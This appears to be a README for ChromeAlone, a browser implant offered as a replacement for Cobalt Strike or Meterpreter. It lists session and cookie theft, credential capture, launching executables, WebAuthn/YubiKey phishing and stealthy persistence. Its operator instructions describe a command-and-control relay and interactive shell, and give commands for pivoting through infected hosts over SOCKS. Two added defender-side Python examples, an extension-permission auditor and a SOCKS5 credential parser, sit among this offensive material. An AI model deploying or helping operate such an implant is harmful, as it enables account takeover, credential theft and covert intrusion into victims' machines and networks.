ChromeAlone: Stealthy Browser Implant Steals Sessions and Phishes for YubiKeys
ChromeAlone is a browser implant that can be used in place of conventional implants like Cobalt Strike or Meterpreter. This repo provides a simple build process that generates a management console, deploys infrastructure, and creates a PowerShell sideloader script to run on targets.
After installation, each ChromeAlone implant will provide mechanisms for:
- Providing a SOCKS TCP Proxy on the host
- Browser session stealing and credential capture
- Launching executables on the host from Chrome
- Phishing for WebAuthn requests for physical security tokens like YubiKeys or Titan Security Keys.
- An EDR-resistant form of persistence on the host, implemented entirely with Chromium’s built-in features.
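The capability list above maps onto a small set of documented Chrome extension permissions (proxy control, native messaging, cookies, history, request observation, WebAuthn proxying). The following auditor is an added defender-side example, not code from the ChromeAlone project: it walks a Chrome profile's Extensions directory and scores each manifest by how many of those permissions it requests, so an analyst can surface an extension that has been sideloaded with the same footprint. The assumption that ChromeAlone's manifest requests these exact permissions is an inference from the capability list; the page does not show the manifest, and the sample manifests in the block are constructed.

```python
"""Audit Chrome extension manifests for the permission set a browser implant
would need.

Added defender-side example; this is not code from the ChromeAlone project.
The permission names below are documented Chrome extension permissions. That
ChromeAlone requests them is an assumption drawn from its capability list;
the sample manifests are constructed for illustration.
"""
import json
from pathlib import Path

# Documented Chrome extension API permissions and the capability each grants.
HIGH_RISK_PERMISSIONS = {
    "proxy": "control of the browser's proxy settings (proxy/SOCKS relaying)",
    "nativeMessaging": "talks to a native host process (launching executables)",
    "cookies": "reads session cookies for granted hosts (session stealing)",
    "history": "reads browsing history",
    "webRequest": "observes requests, including submitted forms (credential capture)",
    "webAuthenticationProxy": "intercepts WebAuthn requests (security-key phishing)",
    "debugger": "attaches the DevTools protocol to tabs",
}

# Host patterns that grant access to every site.
BROAD_HOST_PATTERNS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}


def audit_manifest(manifest: dict) -> dict:
    """Return the high-risk permissions and broad host access an extension requests."""
    perms = set(manifest.get("permissions", []))
    perms |= set(manifest.get("optional_permissions", []))
    # Manifest V3 keeps host patterns in host_permissions; V2 mixes them into permissions.
    hosts = set(manifest.get("host_permissions", []))
    hosts |= {p for p in perms if "://" in p or p == "<all_urls>"}
    findings = {p: HIGH_RISK_PERMISSIONS[p] for p in sorted(perms) if p in HIGH_RISK_PERMISSIONS}
    broad_hosts = sorted(h for h in hosts if h in BROAD_HOST_PATTERNS)
    return {
        "name": manifest.get("name", "<unnamed>"),
        "version": manifest.get("version", "?"),
        "findings": findings,
        "broad_hosts": broad_hosts,
        # One point per risky API permission, two more for all-sites host access.
        "score": len(findings) + (2 if broad_hosts else 0),
    }


def audit_profile(extensions_dir: Path) -> list:
    """Audit every installed extension under a Chrome profile.

    On Windows the directory is usually
    %LOCALAPPDATA%\\Google\\Chrome\\User Data\\Default\\Extensions,
    laid out as <extension id>/<version>/manifest.json.
    """
    results = []
    for mf in extensions_dir.glob("*/*/manifest.json"):
        with mf.open(encoding="utf-8") as fh:
            entry = audit_manifest(json.load(fh))
        entry["id"] = mf.parent.parent.name
        results.append(entry)
    return sorted(results, key=lambda r: r["score"], reverse=True)


# Constructed samples: the permission set an implant with the capabilities
# listed above would need, next to a benign extension for contrast.
SAMPLE_IMPLANT_MANIFEST = {
    "name": "Sample Sync Helper (constructed)",
    "version": "1.0",
    "manifest_version": 3,
    "permissions": ["proxy", "nativeMessaging", "cookies", "history",
                    "webRequest", "webAuthenticationProxy", "storage"],
    "host_permissions": ["<all_urls>"],
}
SAMPLE_BENIGN_MANIFEST = {
    "name": "Notes (constructed)",
    "version": "2.3",
    "manifest_version": 3,
    "permissions": ["storage"],
}

if __name__ == "__main__":
    for m in (SAMPLE_IMPLANT_MANIFEST, SAMPLE_BENIGN_MANIFEST):
        r = audit_manifest(m)
        print(f"{r['name']}: score={r['score']} risky={list(r['findings'])} hosts={r['broad_hosts']}")
```

A score threshold of about 4 separates the constructed implant-style manifest (6 risky APIs plus all-sites access) from ordinary productivity extensions; the `nativeMessaging` and `webAuthenticationProxy` findings are the ones worth reviewing individually, since few legitimate extensions need either.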
Operator Instructions
Once ChromeAlone is loaded, you can view any connected hosts by opening output/client/index.html. This webapp will be pre-configured to connect back to your deployed BATTLEPLAN relay instance. Note that by default, the relay is firewalled to only allow incoming control access on ports 1080-1181 from the IP that deployed the server. If you wish to modify this, you’ll need to update the EC2 instance’s network settings to include any additional machines.
Most commands can be run from the WebUI including:
- Dumping history + cookies (via the Quick Commands section, which requires selecting a target agent in the Execute Command section)
- Capturing Credentials (these will appear under the Captured Data tab)
- Forcing WebAuthn requests (via the Execute Command section)
- File System reads (via the File Browser tab)
- Executing Shell commands (via the Interactive Shell tab)
The primary exception to this is SOCKS proxying. Each infected host is assigned a unique SOCKS port on the server, which can be seen under the Agent Information section, where each agent has a Port field. The assigned port, combined with the admin credentials stored in output/client/config.js, can be used to configure a host-specific SOCKS proxy.
For example, say we have an agent where the port is 1081, our domain is chrome.alone, our username admin (this is always the case), and our password is thisisnotarealpassword. Here are some example usages:
```
proxychains -q socks5 admin:thisisnotarealpassword@chrome.alone:1081 curl http://ifconfig.me
xfreerdp /cert:ignore /v:<target RDP host> /u:<target RDP username> /proxy:socks5://admin:thisisnotarealpassword@chrome.alone:1081
curl -x socks5h://chrome.alone:1081 -u "admin:thisisnotarealpassword" http://ifconfig.me
```
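Each of the commands above authenticates to the relay with a SOCKS5 username/password, and that sub-negotiation (RFC 1929) carries both values in cleartext on the wire. The parser below is an added example, not part of ChromeAlone or its relay: it decodes the client side of the handshake from captured bytes so that anyone reviewing traffic to a relay (or an incident responder who has a capture of it) can see exactly what is exposed. The sample capture is constructed inside the block, using the placeholder credentials from the text above.

```python
"""Parse the client side of a SOCKS5 handshake from captured bytes.

Added example, not part of ChromeAlone or its relay. A SOCKS5 client first
sends a greeting (RFC 1928) listing the auth methods it supports; if the
proxy selects username/password, the client then sends the RFC 1929
sub-negotiation, which contains the raw username and password with no
encryption or hashing. The sample capture below is constructed.
"""
from dataclasses import dataclass, field
from typing import Optional

SOCKS_VERSION = 0x05
METHOD_NO_AUTH = 0x00
METHOD_USERPASS = 0x02
USERPASS_SUBNEG_VERSION = 0x01


@dataclass
class Socks5ClientHello:
    methods: list = field(default_factory=list)
    username: Optional[str] = None
    password: Optional[str] = None

    @property
    def cleartext_credentials(self) -> bool:
        """True when the stream contained an RFC 1929 username/password request."""
        return self.username is not None


def parse_client_stream(data: bytes) -> Optional[Socks5ClientHello]:
    """Parse a reassembled client->proxy stream: greeting, then (if offered) auth.

    Returns None when the stream does not start with a SOCKS5 greeting.
    """
    if len(data) < 2 or data[0] != SOCKS_VERSION:
        return None
    nmethods = data[1]
    if nmethods == 0 or len(data) < 2 + nmethods:
        return None
    hello = Socks5ClientHello(methods=list(data[2:2 + nmethods]))
    rest = data[2 + nmethods:]
    # RFC 1929 layout: VER=1 | ULEN | UNAME | PLEN | PASSWD
    if METHOD_USERPASS in hello.methods and len(rest) >= 2 and rest[0] == USERPASS_SUBNEG_VERSION:
        ulen = rest[1]
        if len(rest) >= 3 + ulen:
            plen = rest[2 + ulen]
            if len(rest) >= 3 + ulen + plen:
                hello.username = rest[2:2 + ulen].decode("utf-8", "replace")
                hello.password = rest[3 + ulen:3 + ulen + plen].decode("utf-8", "replace")
    return hello


def build_sample_capture(username: str, password: str) -> bytes:
    """Constructed client bytes: a greeting offering no-auth and user/pass,
    followed by the user/pass request a client sends once the proxy picks it."""
    u, p = username.encode(), password.encode()
    greeting = bytes([SOCKS_VERSION, 2, METHOD_NO_AUTH, METHOD_USERPASS])
    auth = bytes([USERPASS_SUBNEG_VERSION, len(u)]) + u + bytes([len(p)]) + p
    return greeting + auth


# Constructed sample using the placeholder credentials from the text.
SAMPLE_CAPTURE = build_sample_capture("admin", "thisisnotarealpassword")

if __name__ == "__main__":
    hello = parse_client_stream(SAMPLE_CAPTURE)
    print(f"methods offered: {hello.methods}")
    if hello.cleartext_credentials:
        print(f"cleartext SOCKS5 credentials: {hello.username!r} / {hello.password!r}")
```

The practical consequence for the setup described in this section is that the relay's firewall rule (control ports reachable only from the deploying IP) is doing all of the work: the SOCKS5 layer itself offers no confidentiality for the operator password, and the `curl` form additionally places it on the command line, where process listings and shell history will record it.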
Install